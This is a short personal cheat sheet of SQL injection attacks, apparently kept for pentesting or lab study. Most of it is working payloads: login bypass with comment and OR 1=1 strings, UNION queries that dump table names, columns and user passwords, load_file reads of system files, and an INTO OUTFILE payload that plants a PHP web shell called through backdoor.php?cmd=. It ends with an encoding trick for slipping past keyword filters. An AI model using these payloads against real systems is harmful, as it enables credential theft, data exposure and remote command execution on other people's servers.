SQLi Exploits

Burp Cheat sheet Rana Kalil Video playlist SQLi Cheatsheet from Codingo

See Enumeration Section

Notes

Goal is to initially find a location for SQLi and hopefully determine what the actual query is Test possibles injection locations:

  • '
  • ' --
  • ' OR 1=1
  • ' OR 1=1; -- -
  • 'UNION SELECT * FROM users WHERE 1=1; -- -
  • Note that -- is for comments meaning that everything after that (including what you don’t see) will not be included, so if there is another clause, like ‘AND variable = 1’, it will return everything whether than variable is 1 or 0. Ex: username=administrator'--'&password=password123
    • This query should be SELECT x FROM y WHERE username = administrator and password = password123
    • But this comments out the last part and will simply SELECT the account of administrator, ignoring whether that was the correct password.

UNION SQLi

UNION SELECT - selecting data from an additional table in addition to the intended table

Determine Number of Columns:

  1. $validQuery ORDER by 1
  2. $validQuery ORDER by 2
  3. and so on until error, then you can form a union statement to chain a second query and see how data is displayed.

Start with UNION ALL SELECT 1, 2, X. Then you can determine which column has the most space, making room for more fun commands/exploits (Commands below are based on MariaDB, others might be different) Enumeration Examples:

  • UNION ALL SELECT 1, 2, @@version
  • UNION ALL SELECT 1, 2, user ()
  • UNION ALL SELECT 1, 2, table_name FROM information_schema.tables - this can grab the table name, like with “users” below
    • Then you can use the table name (users) to reveal other columns:UNION ALL SELECT 1, 2. column_name FROM information_schema.columns WHERE table_name='users'
    • Then you can reveal other info from those columns: UNION ALL SELECT 1, username, password FROM users
  • UNION ALL SELECT 1, 2, load_file('C:/Windows/System32/drivers/etc/hosts') - You might be able to use the load_file function to execute code on the system as well:
  • UNION ALL SELECT 1, 2, "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE 'c:/xampp/htdocs/backdoor.php' - using the into OUTFILE to write code, and insert it into the system.
    • This might present an error, but you could test it with the previous command and see if the file was created.
    • OR you can just run it by trying $Host/backdoor.php?cmd=$cmd

Filter bypass

XML encoding

&#x53;ELECT instead of SELECT to bypass prohibited keywords

  • Decoded server-side before being passed to SQL interpreter